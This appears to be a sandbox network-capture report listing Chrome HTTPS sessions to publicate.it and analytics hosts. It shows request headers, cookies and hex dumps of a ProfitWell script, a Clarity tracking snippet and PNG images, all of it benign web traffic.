                                                                                                                                                                                                        X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC637INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 61 2c 72 2c 69 2c 74 2c 79 29 7b 66 75 6e 63 74 69 6f 6e 20 73 79 6e 63 28 29 7b 28 6e 65 77 20 49 6d 61 67 65 29 2e 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 2e 63 6c 61 72 69 74 79 2e 6d 73 2f 63 2e 67 69 66 22 7d 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 3f 73 79 6e 63 28 29 3a 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 73 79 6e 63 29 3b 69 66 28 61 5b 63 5d 2e 76 7c 7c 61 5b 63 5d 2e 74 29 72 65 74 75 72 6e 20 61 5b 63 5d 28 22 65 76 65 6e 74 22 2c 63 2c 22 64 75 70 2e 22 2b 69 2e 70 72 6f 6a 65 63 74 49 64 29 3b 61 5b 63 5d 2e 74 3d 21 30 2c 28 74 3d 6c 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 72 29 29 2e
                                                                                                                                                                                                        Data Ascii: !function(c,l,a,r,i,t,y){function sync(){(new Image).src="https://c.clarity.ms/c.gif"}"complete"==document.readyState?sync():window.addEventListener("load",sync);if(a[c].v||a[c].t)return a[c]("event",c,"dup."+i.projectId);a[c].t=!0,(t=l.createElement(r)).


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        90192.168.2.5498603.165.190.574436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC571OUTGET /js/profitwell.js?auth=c61691493c428b337ecf0f72fa2f9c82 HTTP/1.1
                                                                                                                                                                                                        Host: public.profitwell.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                        Referer: https://publicate.it/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC580INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                        Content-Length: 35585
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Last-Modified: Tue, 09 Jul 2024 13:11:16 GMT
                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                        x-amz-version-id: JMGvWLo2AcS0vj3xea6qA74DPu3IPDGF
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Server: AmazonS3
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:25 GMT
                                                                                                                                                                                                        ETag: "37633505b47eda9da0bd471c2816b38b"
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                        Via: 1.1 a5b35da3a37f3b4542ea89737243a522.cloudfront.net (CloudFront)
                                                                                                                                                                                                        X-Amz-Cf-Pop: ZRH55-P2
                                                                                                                                                                                                        X-Amz-Cf-Id: DX5Pl2p5Ov-PmTjLps7QqqsjMFnS28WgYuNX9XkVtExKGFLZ3HbiPw==
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC16384INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 7d 72 65 74 75 72 6e 20 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 72 61 63 6b 41 6e 6f 6e 79 6d 6f 75 73 43 75 73 74 6f 6d 65 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 41 6e 6f 6e 79 6d 6f 75 73 49 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 2c 74 7d 28 29 2c 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 72 65 74 75 72 6e 28 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 7c 7c 7b 5f 5f 70 72 6f 74 6f 5f 5f 3a 5b 5d 7d 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 26 26 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                        Data Ascii: !function(){"use strict";var t=function(){function t(){}return t.prototype.trackAnonymousCustomer=function(){},t.prototype.getAnonymousId=function(){return null},t}(),e=function(t,r){return(e=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC16384INData Raw: 20 74 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 72 6f 66 69 74 77 65 6c 6c 2d 6a 73 22 29 3b 6e 75 6c 6c 21 3d 3d 74 26 26 74 68 69 73 2e 64 69 67 65 73 74 41 75 74 68 44 61 74 61 41 74 74 72 69 62 75 74 65 28 74 29 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 73 74 79 6c 65 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 68 69 73 2e 63 75 73 74 6f 6d 53 74 79 6c 65 73 2e 73 65 74 43 75 73 74 6f 6d 53 74 79 6c 65 73 28 74 29 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 6e 5f 63 61 6e 63 65 6c 6c 61 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 28 74 68 69 73 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 2c 65 2c 6e 2c 6f 3d 74 68 69 73 3b 72 65 74
                                                                                                                                                                                                        Data Ascii: t=document.getElementById("profitwell-js");null!==t&&this.digestAuthDataAttribute(t)},t.prototype.styles=function(t){this.customStyles.setCustomStyles(t)},t.prototype.on_cancellation=function(){return n(this,void 0,void 0,(function(){var t,e,n,o=this;ret
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC2817INData Raw: 65 2e 61 64 64 43 75 73 74 6f 6d 53 74 79 6c 65 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 72 3d 74 2e 69 6e 63 6c 75 64 65 73 28 22 3f 22 29 3f 22 26 22 3a 22 3f 22 3b 72 65 74 75 72 6e 22 22 2b 74 2b 72 2b 22 63 75 73 74 6f 6d 5f 73 74 79 6c 65 73 3d 22 2b 65 7d 2c 74 7d 28 29 2c 4f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 74 68 69 73 2e 69 73 45 6e 61 62 6c 65 64 3d 21 31 7d 72 65 74 75 72 6e 20 74 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 64 69 73 61 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 74 7d 28 29 2c 54 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 2c 65 2c 72 29
                                                                                                                                                                                                        Data Ascii: e.addCustomStyles=function(t,e){var r=t.includes("?")?"&":"?";return""+t+r+"custom_styles="+e},t}(),O=function(){function t(){this.isEnabled=!1}return t.prototype.initialize=function(){},t.prototype.disable=function(){},t}(),T=function(){function t(t,e,r)


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        91192.168.2.549869104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1036OUTGET /images/template1-p-500.png HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC744INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:24 GMT
                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                        Content-Length: 86062
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:04 GMT
                                                                                                                                                                                                        etag: "1502e-620aa1d11719d"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v8kJchHLcTD88tEsOjND9DB9148%2Fv3QC6UTrX9zUUcUDthTMHplSiYwvAptTNgr7CiSOHTeM2932TgbkTItr9ibGfw6V2bWnZNurFUO5kUz8jrnawvvIk01lVC9IMw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615c83d720f3e-EWR
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC625INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 f4 00 00 02 62 08 03 00 00 00 06 df c0 7b 00 00 03 00 50 4c 54 45 4c 69 71 b5 bd c4 fe fe ff ff ff ff 8d 8d 8d ff ff ff 4e 4e 4e 02 02 02 02 02 02 0d 30 53 eb ed ee fb fb fb ff ff ff 1e 3f 60 ff ff ff ff ff ff 1d 3e 5f 1c 3d 5e 1d 3e 5f f0 f2 f2 f1 f4 f4 44 80 c1 fd fe fe fa fb fb 21 41 62 18 3a 5c ec ed ed f3 f5 f4 ef f0 ef d8 de e3 f6 f7 f9 20 40 61 ce d6 dd 14 37 59 23 39 06 0e 1b 06 fc fc fc 3e 5a 76 b9 c4 ce 09 13 04 eb ef f1 22 2c 10 1a 22 0d 1b 2e 05 a0 b0 be eb ec e9 11 23 06 e9 ea e5 36 4b 08 e5 e9 ec 99 a9 b7 37 52 70 f5 f6 f6 a8 b7 c4 6a 86 66 09 2c 52 2e 4c 6c 33 38 22 2e 36 12 c3 cd d5 92 a3 b2 82 94 a6 05 08 03 2e 40 07 d3 b3 97 b0 be ca 26 46 06 3b 58 06 47 61 06 39 41 16 c6 7d 6b 24
                                                                                                                                                                                                        Data Ascii: PNGIHDRb{PLTELiqNNN0S?`>_=^>_D!Ab:\ @a7Y#9>Zv",".#6K7Rpjf,R.Ll38".6.@&F;XGa9A}k$
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 4b 67 6b 50 bf d7 ef ae 59 42 4e 59 69 f1 ce c2 68 74 79 67 67 2a 72 3b 36 7c 6f 56 d4 d2 cc 73 63 41 64 68 10 5a 6d 83 32 43 6c b1 ce e8 9c 8b 78 32 75 bb d7 e7 f6 79 75 1d bd c0 bd cd cb c0 85 8b 17 dc dc d8 82 99 79 8b 84 6b 90 73 75 08 22 45 5d 33 29 76 99 b3 f6 e8 e3 54 66 5e 8c 5d 3f 3e 55 5a 7d 84 4a be a9 a3 9a a2 84 1f 32 4e 8c a8 c0 a9 7f 81 e4 d9 d1 79 a8 cd eb a8 91 ac 97 90 2a 46 45 ea bb ac 33 67 98 07 84 d6 ac b1 93 51 22 23 57 92 c0 89 2e 4d 66 9f cb 95 95 36 08 4e 7a 96 8d 61 06 63 bc 02 3d 9e c3 c3 a7 4a 7c ab 06 2b 70 b5 a5 5c 15 60 68 7a 00 00 00 0d 74 52 4e 53 00 18 d3 d4 08 bf 0a 02 05 fc 45 77 9d e6 6c b3 19 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ec bd 0b 50 9b d7 b5 f7 9d 9e 93
                                                                                                                                                                                                        Data Ascii: KgkPYBNYihtygg*r;6|oVscAdhZm2Clx2uyuyksu"E]3)vTf^]?>UZ}J2Ny*FE3gQ"#W.Mf6Nzac=J|+p\`hztRNSEwlpHYs IDATxP
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 34 b8 77 7f ee 7b ff 14 12 e4 4b d8 d1 d0 bf f2 7a c0 75 4e 0c 53 11 f0 e3 48 d2 00 3c 9a db 10 fb fb 7c 85 c2 57 fe db 31 d0 7d 83 42 fe 09 05 f0 1b a4 be 1a c6 11 6d 64 ff ef ae d2 3d cc 0f d8 48 2b 94 c1 c3 13 5f 5d f5 f0 2b 51 e0 6a 79 16 c7 fc 74 31 76 b5 44 b3 03 a0 fb 93 6d c4 4d 42 39 0f f3 17 9f fb 7e 18 6d fb 0f e9 1b a1 af c3 b1 ae 8e be b9 6f 7f 19 f7 ed 1e ea 1b 3c fc 46 71 6f 76 e1 78 df 6c 7f e8 3e 41 64 5a 18 2a d0 ac a7 8e 6a b3 f0 e0 0b 71 db 3c 45 7f 1a fa da 58 fb f5 f2 47 cc c3 54 04 6f c2 c8 c3 bf 9a 1a b4 6e 5c ff c6 9e 64 07 40 87 64 3d ee 85 95 f5 4e 5e d0 3d 42 ff de be c8 d7 b6 bf 77 5f 5f 86 5d 9b 05 dd 2c 4f 5f 37 20 03 73 bf b0 35 df 8e 1b 79 c6 33 ae 13 36 22 5f 0b d2 bd ee ad 5e 1b 3e 3b 06 ba ff 6b 91 fb 3c 55 b9 17 9f 86
                                                                                                                                                                                                        Data Ascii: 4w{KzuNSH<|W1}Bmd=H+_]+Qjyt1vDmMB9~mo<Fqovxl>AdZ*jq<EXGTon\d@d=N^=Bw__],O_7 s5y36"_^>;k<U
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 83 b8 b5 fa c9 8a e4 57 ba 61 d1 be 54 eb 8c 84 1b 61 a5 ef dd ab d5 75 c3 04 ee fa 54 61 b5 3a 43 d8 fe f6 9d 4b d9 36 b4 27 af 2e 6d f1 4e ad 3d 2b 5c 4e 86 20 4b da 60 f8 c8 1e b0 59 13 c5 ea 05 b4 36 a6 6f c8 08 77 a1 ff e3 a0 af 0d da eb 7a 5a 56 77 ed 5e 45 84 5f 04 c8 bd 7f cd 67 09 fa ad 16 67 3c 61 9c 97 a8 d7 a0 af c5 88 bb d0 b7 74 4c f7 9e 25 f1 9a 43 f7 12 26 81 54 1d fd f5 1f 62 18 fd 4c 34 51 7c 27 dc bb d7 10 bc 5a 82 5d ad bb af de f1 b7 ad d4 e0 a2 bd cc db cb 87 84 a8 60 d9 93 27 4e 7f ba fc e3 d5 4e bf 3a c2 ef ba f7 2d 86 be c9 65 e0 5d 5a 23 91 9f 36 d2 7a 5b 57 88 5b 9b 45 5d bd a6 d6 e1 df 0d e4 b6 ed 2c 9b 57 2d de cb 7c bf e2 2a d9 70 7f 93 82 ef ba 18 62 d7 bd 6f 31 74 af 35 2d ab 0d ac ab 55 95 d5 6e aa f5 86 1e 82 c0 10 bf e7
                                                                                                                                                                                                        Data Ascii: WaTauTa:CK6'.mN=+\N K`Y6owzZVw^E_gg<atL%C&TbL4Q|'Z]`'NN:-e]Z#6z[W[E],W-|*pbo1t5-Un
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: df e2 3b 14 10 56 4f 1d b4 7a 26 7f 74 7a f4 66 41 d5 d5 3e a4 ea a8 a8 58 74 2e c2 76 b6 1d 0e 3d 88 4c 4b ea ef ef 8f 8b 96 fa 93 62 23 fb fb 03 02 02 e2 66 48 41 24 5a 52 00 2b 16 6e a3 fb 55 fe ab d0 75 71 e8 88 78 5f 5a f4 cb 44 e2 01 d5 4c dc c9 80 7e 78 e8 64 74 14 c9 97 16 1d 10 19 eb eb 1b 15 72 32 00 7f 34 4e aa 42 c7 07 eb a0 01 de 37 36 32 20 b5 da d7 a7 9a 15 a7 24 eb 82 e1 89 fe f8 f8 fe c8 58 72 2c ab 3f 3e 88 ac 8c 4b ad 56 05 ec 23 06 86 44 91 82 76 a1 ff 7d a1 9f 24 be 7c 80 48 3c 20 25 47 85 10 5f 3d 19 70 32 6e 86 44 20 e9 f6 12 0f 48 01 7a 30 91 b3 06 5d 15 48 3c 10 70 f2 64 7c 6c 12 31 2c 2e ee 00 47 1a 77 32 20 8c 08 8f 45 47 91 48 b6 40 62 98 94 84 a0 1f 20 12 c3 02 4e c6 49 23 89 fb 0f 04 9c c4 a1 93 a2 e2 88 7b 6d 24 df d8 e0 57
                                                                                                                                                                                                        Data Ascii: ;VOz&tzfA>Xt.v=LKb#fHA$ZR+nUuqx_ZDL~xdtr24NB762 $Xr,?>KV#Dv}$|H< %G_=p2nD Hz0]H<pd|l1,.Gw2 EGH@b NI#{m$W
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 68 51 2b 8f c5 22 a5 c7 7a 0e a8 a6 e9 6c 36 69 2c 19 15 57 69 b4 6a f4 fa d5 d7 f8 fb f8 54 c3 83 04 1f c2 ca 0b d0 c6 c1 fe 51 50 76 81 43 ab 7d 57 9e f0 c7 df 1f ce ec ef 4b 88 92 da 6c 3a 9a 2f 7c 84 1f 61 3b db ce 86 0e d4 c9 10 68 f9 92 f7 90 e1 9f c7 f0 fd 63 bc 1e c3 0b 26 f8 47 78 ec 21 e3 b7 24 98 99 23 90 e0 68 38 cb da 6b d0 5d 92 f7 0b d0 bc 2c ec 24 8c bf a1 2f 61 e5 09 5f cf fb a3 b3 f8 ac 1e bc 1b bd ff 5d 99 fb 10 82 fc 61 12 cc df 3f 88 10 e4 8f 2c 08 b6 f5 46 5b 7a 7b 3d 86 17 c9 56 ee 04 21 c3 8f f2 f7 07 a2 41 fe 6b af 41 a7 f3 9c 7b f5 d5 e8 1e 7a 10 3d b7 f6 04 7a ff 20 f4 e0 ca 69 b7 f9 90 be f3 95 be 79 bb 0b fa c3 6f dc 2d 60 43 2b cc da 51 84 95 44 7e 7d 77 8c d7 0b 56 8f 5c cd f9 9f 6e 9b 59 69 b0 d8 f6 cc 77 3a f4 ff a9 ad 6f
                                                                                                                                                                                                        Data Ascii: hQ+"zl6i,WijTQPvC}WKl:/|a;hc&Gx!$#h8k],$/a_]a?,F[z{=V!AkA{z=z iyo-`C+QD~}wV\nYiw:o
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 2d a4 33 18 74 a1 50 88 61 18 9f 5f 25 a4 d3 f9 d9 d9 55 25 e6 66 cb 92 87 f9 c2 42 eb ad 69 11 97 db 24 ca fa e0 83 2c 89 4b ab 55 77 8a 19 74 4a e2 a1 37 de 38 94 78 30 22 e2 60 5e 5e 5e 86 50 4c 65 30 18 4c b8 16 f2 04 18 57 20 10 88 44 22 91 40 20 10 48 dc 8d 25 25 25 56 fb 30 14 dd b7 18 7a 20 10 1f fd d9 db 6f 47 cd c4 47 86 04 87 44 73 8e 19 8e e6 75 15 67 1f cf e8 32 74 65 d0 f9 42 36 83 d1 d3 83 75 e5 1d 3c 78 90 3b 37 07 7f ae dc ee dc dc de 5e 67 a6 76 a4 6c 98 13 6f 9b b9 51 a2 91 00 75 f4 bb 19 6a 1b c7 47 6d 36 dd 11 84 fb dc 39 0f f4 79 83 00 13 75 77 4f e4 6a de fe 44 62 90 08 44 22 2e 57 24 9f e8 76 37 8e 34 1f 8b 31 b7 70 22 1f 47 b2 80 79 e4 e3 54 d5 8d 9e ec d0 84 04 aa 66 a4 91 9d 97 97 77 f4 e8 d1 a3 87 a9 54 71 b6 55 82 09 f9 32 e3
                                                                                                                                                                                                        Data Ascii: -3tPa_%U%fBi$,KUwtJ78x0"`^^^PLe0LW D"@ H%%%V0z oGGDsug2teB6u<x;7^gvloQujGm69yuwOjDbD".W$v741p"GyTfwTqU2
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 6d 57 57 46 06 d6 95 91 91 21 31 c0 20 9a 21 93 20 e8 32 8d ab 49 88 55 f5 d4 4a 1a 0e f5 e6 4e 66 4e dd 2b 1b 06 e2 17 17 16 86 47 2f 5d 82 f8 57 a7 b3 d9 46 cd 66 f3 e8 a8 54 49 a3 9d bf 41 43 4a 87 21 1d 34 8e ec d2 cc e0 0d 83 48 20 e0 72 05 02 3a 9b 0d 11 72 28 35 5c 08 b9 98 80 2d 29 d1 48 e4 f2 5c f7 e8 83 d1 9c 9c 9c 3f fc e1 0f e7 07 67 4d a6 e4 34 39 f3 68 5e cc 7f 1d 13 09 8e dd 6b 38 78 90 c2 a4 d2 85 19 30 f4 30 e8 1a 75 9f 7d 60 56 ad d6 e2 31 1a 20 e7 f1 3a d2 fb fa d4 2e 8d 7d b2 af 6f 72 72 64 35 80 07 ee 1d 1d a6 c5 a5 d9 82 d9 5f fd f1 57 83 f5 62 8f d4 1b 1a 7a 73 8f d9 a4 68 f8 b9 a4 54 36 4a d0 80 5e 3b 6e d6 60 2e 09 bd 2b 0f 98 ae 98 33 48 00 00 20 00 49 44 41 54 33 8e 67 37 2e 2d 2c 59 8c 1a 19 86 61 ce c9 4e 59 01 2f 25 25 a5 b0
                                                                                                                                                                                                        Data Ascii: mWWF!1 ! 2IUJNfN+G/]WFfTIACJ!4H r:r(5\-)H\?gM49h^k8x00u}`V1 :.}orrd5_WbzshT6J^;n`.+3H IDAT3g7.-,YaNY/%%
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: a5 25 77 98 9c 5d d9 f5 55 6c 06 35 34 74 59 3b bc 58 59 59 e9 58 5c 5a ba a5 cd 9c 9c ac 53 ce 18 1d 05 c6 5f 7d f6 d9 af 66 ec 39 ef 68 f2 1a 80 79 6f ee b1 e8 78 a9 ee ac ee ec d9 23 52 a9 79 0a 2a ac 43 cd a9 66 8c de e8 a6 87 33 13 0f 65 c9 f5 02 81 fb 16 0f f2 b3 b6 b6 b6 b6 94 eb 99 99 68 54 07 2b 7c f2 bb 27 6d ed c9 bc c2 b6 77 a7 30 54 92 3b 7a f0 c2 05 a0 4f 3f 4e a5 77 49 24 86 86 c4 83 0d 9e ac cd a9 e9 c9 a9 e2 63 4e f5 d0 af b7 bc 38 f3 5f 2e b7 5b 0f b0 f3 f2 0e 1e 34 e4 42 08 77 b0 a1 37 0f 9c 9a a6 d1 32 3c dc 5a d6 d2 c2 69 2d 2b 6b 8e 79 f4 f1 9a c6 21 6f b5 58 5a e2 e3 1f a8 60 44 3c 77 ee d3 4f 2f 9d 3b a2 1b bd 6a 68 68 a0 50 b8 11 59 22 43 d4 79 a5 52 aa b3 8d 8e 0f 36 0e 8e 0f b4 70 38 c7 0c 79 5d 86 9e ae ae ae e2 aa aa 9e 1e 59
                                                                                                                                                                                                        Data Ascii: %w]Ul54tY;XYYX\ZS_}f9hyox#Ry*Cf3ehT+|'mw0T;zO?NwI$cN8_.[4Bw72<Zi-+ky!oXZ`D<wO/;jhhPY"CyR6p8y]Y
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 95 b9 d7 63 46 bb 32 1a ca 3f fe f8 5e f9 7c 63 a3 39 fe f7 ff f6 bf 54 ad 16 28 e5 aa b7 1e fa dd 21 a3 71 c4 68 30 e4 ea f5 72 a7 cb de 33 98 9a 34 8c 88 73 ca ee 1d 2b 2f ef ee ce 85 89 b0 dc 08 4a a2 68 ea fe ec 90 d1 65 b7 ba 8c 23 16 4b cb c8 ad 91 01 1d 68 fc 9c 54 8a 27 e3 6f d2 6e 48 d8 14 54 b4 66 30 c4 62 be 10 93 48 44 10 21 f7 42 c4 60 18 8f 4f b5 8d d7 76 61 98 40 d0 d4 24 68 c2 30 ac a9 49 26 13 70 d9 6c d0 b9 48 54 0a df 89 9c 99 7d 73 5e fe 3d ad a6 e6 fa 75 a4 7c 44 bd 22 a5 bd c3 25 ab ca e6 d7 77 2e 4f a2 74 2c 1f a0 a3 30 bd 52 9d 99 9e ae e8 f9 e4 93 e2 62 01 c6 66 4b 5c ee 47 d3 d3 d3 dd 13 13 a5 22 fd c4 c4 b1 b2 d9 a5 e0 5f 2f 3a 1c a6 c5 f6 8e f6 9f ff ef a4 2b 1e bb 79 f3 5a b4 ca 76 d6 a6 3b ab 93 ce 0c dc 2b ef ee ed 6d a8 1d
                                                                                                                                                                                                        Data Ascii: cF2?^|c9T(!qh0r34s+/Jhe#KhT'onHTf0bHD!B`Ova@$h0I&plHT}s^=u|D"%w.Ot,0RbfK\G"_/:+yZv;+m


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        92192.168.2.549870104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1036OUTGET /images/template2-p-500.png HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC749INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:24 GMT
                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                        Content-Length: 111731
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "1b473-620aa1d262291"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
